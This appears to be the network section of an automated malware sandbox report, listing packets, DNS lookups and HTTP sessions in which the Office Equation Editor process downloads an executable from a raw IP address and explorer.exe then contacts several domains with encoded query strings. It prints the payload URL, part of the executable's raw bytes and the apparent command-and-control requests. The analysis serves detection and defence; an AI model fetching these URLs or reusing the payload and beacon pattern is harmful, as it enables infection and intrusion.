May 13, 2021 08:29:35.987580061 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987597942 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987644911 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987649918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987685919 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987696886 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987724066 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987746000 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987761974 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987791061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987858057 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987895012 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987912893 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987914085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.987963915 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.987982035 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.988023043 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.988034010 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.988059044 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.988071918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.988105059 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.988107920 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.988147020 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.988174915 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.988183022 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.988198042 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.988250971 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.988285065 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.988289118 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.988301992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.988353014 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:36.654887915 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:36.654954910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:36.680119991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:30:39.283775091 CEST	49168	80	192.168.2.22	156.241.53.161
May 13, 2021 08:30:39.513283014 CEST	80	49168	156.241.53.161	192.168.2.22
May 13, 2021 08:30:39.513482094 CEST	49168	80	192.168.2.22	156.241.53.161
May 13, 2021 08:30:39.513780117 CEST	49168	80	192.168.2.22	156.241.53.161
May 13, 2021 08:30:39.744540930 CEST	80	49168	156.241.53.161	192.168.2.22
May 13, 2021 08:30:40.056502104 CEST	80	49168	156.241.53.161	192.168.2.22
May 13, 2021 08:30:40.056554079 CEST	80	49168	156.241.53.161	192.168.2.22
May 13, 2021 08:30:40.057077885 CEST	49168	80	192.168.2.22	156.241.53.161
May 13, 2021 08:30:40.057261944 CEST	49168	80	192.168.2.22	156.241.53.161
May 13, 2021 08:30:40.287481070 CEST	80	49168	156.241.53.161	192.168.2.22
May 13, 2021 08:30:52.494201899 CEST	49169	80	192.168.2.22	23.227.38.74
May 13, 2021 08:30:52.538006067 CEST	80	49169	23.227.38.74	192.168.2.22
May 13, 2021 08:30:52.538094044 CEST	49169	80	192.168.2.22	23.227.38.74
May 13, 2021 08:30:52.538312912 CEST	49169	80	192.168.2.22	23.227.38.74
May 13, 2021 08:30:52.579984903 CEST	80	49169	23.227.38.74	192.168.2.22
May 13, 2021 08:30:52.716888905 CEST	80	49169	23.227.38.74	192.168.2.22
May 13, 2021 08:30:52.716916084 CEST	80	49169	23.227.38.74	192.168.2.22
May 13, 2021 08:30:52.716931105 CEST	80	49169	23.227.38.74	192.168.2.22
May 13, 2021 08:30:52.716942072 CEST	80	49169	23.227.38.74	192.168.2.22
May 13, 2021 08:30:52.716949940 CEST	80	49169	23.227.38.74	192.168.2.22
May 13, 2021 08:30:52.716958046 CEST	80	49169	23.227.38.74	192.168.2.22
May 13, 2021 08:30:52.717154980 CEST	49169	80	192.168.2.22	23.227.38.74
May 13, 2021 08:30:52.717201948 CEST	49169	80	192.168.2.22	23.227.38.74
May 13, 2021 08:30:52.717211008 CEST	49169	80	192.168.2.22	23.227.38.74
May 13, 2021 08:30:57.821912050 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:57.953435898 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:57.953617096 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:57.953911066 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.093216896 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093250990 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093275070 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093298912 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093322039 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093346119 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093369007 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093414068 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.093425035 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093451977 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.093452930 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093477011 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.093502998 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.093586922 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.226202965 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226275921 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226320028 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226356983 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226396084 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226435900 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226443052 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.226473093 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226476908 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.226511002 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.226511955 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226566076 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226607084 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.226613045 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226655006 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226679087 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.226695061 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226727962 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:30:58.226764917 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.226986885 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.227123976 CEST	49170	80	192.168.2.22	54.85.86.211
May 13, 2021 08:30:58.359119892 CEST	80	49170	54.85.86.211	192.168.2.22
May 13, 2021 08:31:03.696605921 CEST	49171	80	192.168.2.22	75.2.66.247
May 13, 2021 08:31:03.737265110 CEST	80	49171	75.2.66.247	192.168.2.22
May 13, 2021 08:31:03.737392902 CEST	49171	80	192.168.2.22	75.2.66.247
May 13, 2021 08:31:03.737710953 CEST	49171	80	192.168.2.22	75.2.66.247
May 13, 2021 08:31:03.778146029 CEST	80	49171	75.2.66.247	192.168.2.22
May 13, 2021 08:31:04.017532110 CEST	80	49171	75.2.66.247	192.168.2.22
May 13, 2021 08:31:04.017581940 CEST	80	49171	75.2.66.247	192.168.2.22
May 13, 2021 08:31:04.017844915 CEST	49171	80	192.168.2.22	75.2.66.247
May 13, 2021 08:31:04.017927885 CEST	49171	80	192.168.2.22	75.2.66.247
May 13, 2021 08:31:04.044008017 CEST	80	49171	75.2.66.247	192.168.2.22
May 13, 2021 08:31:04.044225931 CEST	49171	80	192.168.2.22	75.2.66.247
May 13, 2021 08:31:04.059523106 CEST	80	49171	75.2.66.247	192.168.2.22
May 13, 2021 08:31:09.091825962 CEST	49172	80	192.168.2.22	104.21.65.7
May 13, 2021 08:31:09.132831097 CEST	80	49172	104.21.65.7	192.168.2.22
May 13, 2021 08:31:09.132956028 CEST	49172	80	192.168.2.22	104.21.65.7
May 13, 2021 08:31:09.133264065 CEST	49172	80	192.168.2.22	104.21.65.7
May 13, 2021 08:31:09.175864935 CEST	80	49172	104.21.65.7	192.168.2.22
May 13, 2021 08:31:09.192511082 CEST	80	49172	104.21.65.7	192.168.2.22
May 13, 2021 08:31:09.192543030 CEST	80	49172	104.21.65.7	192.168.2.22
May 13, 2021 08:31:09.192684889 CEST	49172	80	192.168.2.22	104.21.65.7
May 13, 2021 08:31:09.192776918 CEST	49172	80	192.168.2.22	104.21.65.7
May 13, 2021 08:31:09.233691931 CEST	80	49172	104.21.65.7	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 13, 2021 08:30:39.203344107 CEST	52197	53	192.168.2.22	8.8.8.8
May 13, 2021 08:30:39.269969940 CEST	53	52197	8.8.8.8	192.168.2.22
May 13, 2021 08:30:45.059938908 CEST	53099	53	192.168.2.22	8.8.8.8
May 13, 2021 08:30:45.124401093 CEST	53	53099	8.8.8.8	192.168.2.22
May 13, 2021 08:30:52.420767069 CEST	52838	53	192.168.2.22	8.8.8.8
May 13, 2021 08:30:52.493030071 CEST	53	52838	8.8.8.8	192.168.2.22
May 13, 2021 08:30:57.756908894 CEST	61200	53	192.168.2.22	8.8.8.8
May 13, 2021 08:30:57.819938898 CEST	53	61200	8.8.8.8	192.168.2.22
May 13, 2021 08:31:03.235810041 CEST	49548	53	192.168.2.22	8.8.8.8
May 13, 2021 08:31:03.694025040 CEST	53	49548	8.8.8.8	192.168.2.22
May 13, 2021 08:31:09.024107933 CEST	55627	53	192.168.2.22	8.8.8.8
May 13, 2021 08:31:09.089735985 CEST	53	55627	8.8.8.8	192.168.2.22
May 13, 2021 08:31:19.212193012 CEST	56009	53	192.168.2.22	8.8.8.8
May 13, 2021 08:31:19.270813942 CEST	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 13, 2021 08:30:39.203344107 CEST	192.168.2.22	8.8.8.8	0xccff	Standard query (0)	www.hfjxhs.com	A (IP address)	IN (0x0001)
May 13, 2021 08:30:45.059938908 CEST	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.zgcbw.net	A (IP address)	IN (0x0001)
May 13, 2021 08:30:52.420767069 CEST	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.essentiallyourscandles.com	A (IP address)	IN (0x0001)
May 13, 2021 08:30:57.756908894 CEST	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.brunoecatarina.com	A (IP address)	IN (0x0001)
May 13, 2021 08:31:03.235810041 CEST	192.168.2.22	8.8.8.8	0x6ec7	Standard query (0)	www.zmzcrossrt.xyz	A (IP address)	IN (0x0001)
May 13, 2021 08:31:09.024107933 CEST	192.168.2.22	8.8.8.8	0xf09a	Standard query (0)	www.cyrilgraze.com	A (IP address)	IN (0x0001)
May 13, 2021 08:31:19.212193012 CEST	192.168.2.22	8.8.8.8	0x18f7	Standard query (0)	www.myfavbutik.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 13, 2021 08:30:39.269969940 CEST	8.8.8.8	192.168.2.22	0xccff	No error (0)	www.hfjxhs.com		156.241.53.161	A (IP address)	IN (0x0001)
May 13, 2021 08:30:45.124401093 CEST	8.8.8.8	192.168.2.22	0x2e78	Name error (3)	www.zgcbw.net	none	none	A (IP address)	IN (0x0001)
May 13, 2021 08:30:52.493030071 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www.essentiallyourscandles.com	essentially-yours-candles-by-taylor.myshopify.com		CNAME (Canonical name)	IN (0x0001)
May 13, 2021 08:30:52.493030071 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	essentially-yours-candles-by-taylor.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
May 13, 2021 08:30:52.493030071 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
May 13, 2021 08:30:57.819938898 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	www.brunoecatarina.com		54.85.86.211	A (IP address)	IN (0x0001)
May 13, 2021 08:31:03.694025040 CEST	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	www.zmzcrossrt.xyz	ytptranspx.xshoppy.shop		CNAME (Canonical name)	IN (0x0001)
May 13, 2021 08:31:03.694025040 CEST	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	ytptranspx.xshoppy.shop		75.2.66.247	A (IP address)	IN (0x0001)
May 13, 2021 08:31:09.089735985 CEST	8.8.8.8	192.168.2.22	0xf09a	No error (0)	www.cyrilgraze.com		104.21.65.7	A (IP address)	IN (0x0001)
May 13, 2021 08:31:09.089735985 CEST	8.8.8.8	192.168.2.22	0xf09a	No error (0)	www.cyrilgraze.com		172.67.138.177	A (IP address)	IN (0x0001)
May 13, 2021 08:31:19.270813942 CEST	8.8.8.8	192.168.2.22	0x18f7	No error (0)	www.myfavbutik.com		104.21.15.16	A (IP address)	IN (0x0001)
May 13, 2021 08:31:19.270813942 CEST	8.8.8.8	192.168.2.22	0x18f7	No error (0)	www.myfavbutik.com		172.67.161.4	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

3.36.53.50

www.hfjxhs.com

www.essentiallyourscandles.com

www.brunoecatarina.com

www.zmzcrossrt.xyz

www.cyrilgraze.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	3.36.53.50	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 13, 2021 08:29:30.839982986 CEST	0	OUT	GET /dose/xele.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 3.36.53.50 Connection: Keep-Alive
May 13, 2021 08:29:31.134192944 CEST	1	IN	HTTP/1.1 200 OK Date: Thu, 13 May 2021 06:29:20 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Last-Modified: Thu, 13 May 2021 06:24:23 GMT ETag: "1bf800-5c2302daaa325" Accept-Ranges: bytes Content-Length: 1832960 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d c5 9c 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e6 1b 00 00 10 00 00 00 00 00 00 92 05 1c 00 00 20 00 00 00 20 1c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 05 1c 00 4f 00 00 00 00 20 1c 00 d0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1c 00 0c 00 00 00 08 04 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 e5 1b 00 00 20 00 00 00 e6 1b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0c 00 00 00 20 1c 00 00 0e 00 00 00 e8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1c 00 00 02 00 00 00 f6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 05 1c 00 00 00 00 00 48 00 00 00 02 00 05 00 54 6d 04 00 34 8e 03 00 03 00 00 00 01 00 00 06 88 fb 07 00 80 08 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 08 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 21 07 00 06 28 34 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 1a 07 00 06 28 35 00 00 0a 00 2a 26 00 02 28 36 00 00 0a 00 2a ce 73 37 00 00 0a 80 01 00 00 04 73 38 00 00 0a 80 02 00 00 04 73 39 00 00 0a 80 03 00 00 04 73 3a 00 00 0a 80 04 00 00 04 73 3b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 40 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 41 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 42 00 00 0a 6f 43 00 00 0a 73 44 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}`P @ `@@O @ H.text `.rsrc @@.reloc@@BtHTm40(,(-(o.(/(0(1(2(3N(o!(4N(o(5&(6s7s8s9s:s;0~o<+0~o=+0~o>+0~o?+0~o@+*0<~(A,!rp(BoCsD~
May 13, 2021 08:29:31.134229898 CEST	3	IN	Data Raw: 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0c 00 00 06 72 35 00 00 70 7e 07 00 00 04 6f 45 00 00 0a 28 46 00 00 0a 0b 07 74 26 00 00 01 Data Ascii: +0~+"0&(r5p~oE(Ft&+0&(r_p~oE(Ft&+0&(ryp~oE(Ft&+0&(rp~oE(Ft&+*
May 13, 2021 08:29:31.134257078 CEST	4	IN	Data Raw: 30 03 00 26 00 00 00 08 00 00 11 00 28 0c 00 00 06 72 91 02 00 70 7e 07 00 00 04 6f 45 00 00 0a 28 46 00 00 0a 0b 07 74 26 00 00 01 0a 2b 00 06 2a 92 73 2a 00 00 06 28 47 00 00 0a 74 06 00 00 02 80 08 00 00 04 73 48 00 00 0a 28 46 00 00 0a 80 0a Data Ascii: 0&(rp~oE(Ft&+s(GtsH(F(I0(oJ,(0oK*0n~,V~(L(M~,(+sNoO,(P
May 13, 2021 08:29:31.134284019 CEST	6	IN	Data Raw: 00 06 72 91 04 00 70 6f 68 00 00 0a 00 02 6f 40 00 00 06 16 6f 64 00 00 0a 00 02 6f 40 00 00 06 20 27 01 00 00 20 9f 00 00 00 73 5c 00 00 0a 6f 5d 00 00 0a 00 02 6f 40 00 00 06 72 b3 04 00 70 6f 5e 00 00 0a 00 02 6f 40 00 00 06 1f 73 1f 17 73 5f Data Ascii: rpoho@odo@ ' s\o]o@rpo^o@ss_o`o@oao@rpoboBodoB s\o]oBrpo^oBss_o`oBoaoBrpoboDod
May 13, 2021 08:29:31.427437067 CEST	7	IN	Data Raw: 19 00 00 04 02 7b 19 00 00 04 14 72 f5 05 00 70 17 8d 19 00 00 01 25 16 02 a2 14 14 28 74 00 00 0a 00 00 00 02 7b 19 00 00 04 14 72 03 06 00 70 16 8d 19 00 00 01 14 14 14 17 28 75 00 00 0a 26 2a 00 00 13 30 01 00 0c 00 00 00 0e 00 00 11 00 02 7b Data Ascii: {rp%(t{rp(u&0{+r(F}(F(P*00{rp(v(F(w,Rr-pox(y(z&(M,%(MrUp(u
May 13, 2021 08:29:31.427473068 CEST	8	IN	Data Raw: 14 fe 01 13 09 11 09 39 ae 00 00 00 1f 15 0c 02 7b 1b 00 00 04 14 72 55 06 00 70 16 8d 19 00 00 01 14 14 14 17 28 75 00 00 0a 26 1f 16 0c 02 14 7d 1b 00 00 04 1f 17 0c 02 6f 3c 00 00 06 7e 84 00 00 0a 6f 82 00 00 0a 00 1f 18 0c 02 6f 48 00 00 06 Data Ascii: 9{rUp(u&}o<~ooHodoFodoDodoBodo@odo:odo8od+XE#NWhxc
May 13, 2021 08:29:31.427488089 CEST	10	IN	Data Raw: 01 00 00 73 5f 00 00 0a 28 6c 00 00 0a 00 02 28 6d 00 00 0a 02 6f 56 00 00 06 6f 6e 00 00 0a 00 02 28 6d 00 00 0a 02 6f 58 00 00 06 6f 6e 00 00 0a 00 02 28 6d 00 00 0a 02 6f 5a 00 00 06 6f 6e 00 00 0a 00 02 28 6d 00 00 0a 02 6f 5c 00 00 06 6f 6e Data Ascii: s_(l(moVon(moXon(moZon(mo\on(mo^on(mo`onrp(^rpoo(p(q&{+"}&{+"}&{ +"} &{!+"}!*&{"
May 13, 2021 08:29:31.427504063 CEST	11	IN	Data Raw: 00 06 6f 94 00 00 0a 00 02 16 28 70 00 00 0a 00 02 28 71 00 00 0a 00 2a 26 02 7b 26 00 00 04 2b 00 2a 22 02 03 7d 26 00 00 04 2a 26 02 7b 27 00 00 04 2b 00 2a 13 30 02 00 37 00 00 00 0d 00 00 11 02 fe 06 7b 00 00 06 73 54 00 00 0a 0a 02 7b 27 00 Data Ascii: o(p(q&{&+"}&&{'+07{sT{',or}'{',os&{(+07zsT{(,or}({(,os&{)+"})&{+6(F}*
May 13, 2021 08:29:31.427524090 CEST	13	IN	Data Raw: 97 00 00 0a 28 98 00 00 0a 28 7c 00 00 06 00 00 2b 19 00 02 72 21 0a 00 70 05 28 97 00 00 0a 28 79 00 00 0a 28 7c 00 00 06 00 00 02 7b 2b 00 00 04 0a 2a 13 30 09 00 e0 00 00 00 15 00 00 11 00 03 14 72 b7 08 00 70 16 8d 19 00 00 01 14 14 14 28 76 Data Ascii: ((\|+r!p((y(\|{+*0rp(v,frqprp(vr5p(vrp(v(F(rp(((\|+rp((y(\|,rp(v
May 13, 2021 08:29:31.427544117 CEST	14	IN	Data Raw: 00 00 00 1e 00 00 00 2c 00 00 00 3a 00 00 00 46 00 00 00 60 00 00 00 6b 00 00 00 89 00 00 00 38 87 00 00 00 00 07 17 d6 0b 17 13 07 38 82 00 00 00 00 11 04 17 d6 13 04 1d 13 07 2b 76 00 02 09 28 84 00 00 06 26 1e 13 07 2b 68 00 11 06 28 b5 00 00 Data Ascii: ,:F`k88+v(&+h(+Z+N,8d+4+) ;,87++89880}E(Brp%%%%
May 13, 2021 08:29:31.427565098 CEST	15	IN	Data Raw: 72 93 0d 00 70 6f 6f 00 00 0a 00 02 16 28 70 00 00 0a 00 2a 26 02 7b 2d 00 00 04 2b 00 2a 00 13 30 02 00 37 00 00 00 0d 00 00 11 02 fe 06 9d 00 00 06 73 54 00 00 0a 0a 02 7b 2d 00 00 04 0b 07 2c 07 07 06 6f 72 00 00 0a 02 03 7d 2d 00 00 04 02 7b Data Ascii: rpoo(p&{-+07sT{-,or}-{-,os&{.+07sT{.,or}.{.,os&{/+07sT{/,or}/{/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	156.241.53.161	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 13, 2021 08:30:39.513780117 CEST	1945	OUT	GET /p2io/?6lzd4R3=DTtQlm+ek3aiRXh2XrobrkMYYvpq+NlfspfnNNuMzI98GFQb/uTk0N0e6q4XVVELH/G/Eg==&Mj=8pGl2P HTTP/1.1 Host: www.hfjxhs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 13, 2021 08:30:40.056502104 CEST	1946	IN	HTTP/1.1 302 Moved Temporarily Date: Thu, 13 May 2021 06:30:39 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=s39c2d3g7e4n55ruh4qa6sh8m7; path=/ Upgrade: h2 Connection: Upgrade, close Location: / Content-Length: 0 Content-Type: text/html; charset=gbk

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 13, 2021 08:30:52.538312912 CEST	1947	OUT	GET /p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P HTTP/1.1 Host: www.essentiallyourscandles.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 13, 2021 08:30:52.716888905 CEST	1948	IN	HTTP/1.1 403 Forbidden Date: Thu, 13 May 2021 06:30:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 149 X-Sorting-Hat-ShopId: 48654778518 X-Dc: gcp-us-central1 X-Request-ID: 2b7b5b43-b163-4dda-a5cd-16cb6a76f56e X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: 0a0604d39800002ba1a4913000000001 Server: cloudflare CF-RAY: 64e9d7328f842ba1-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 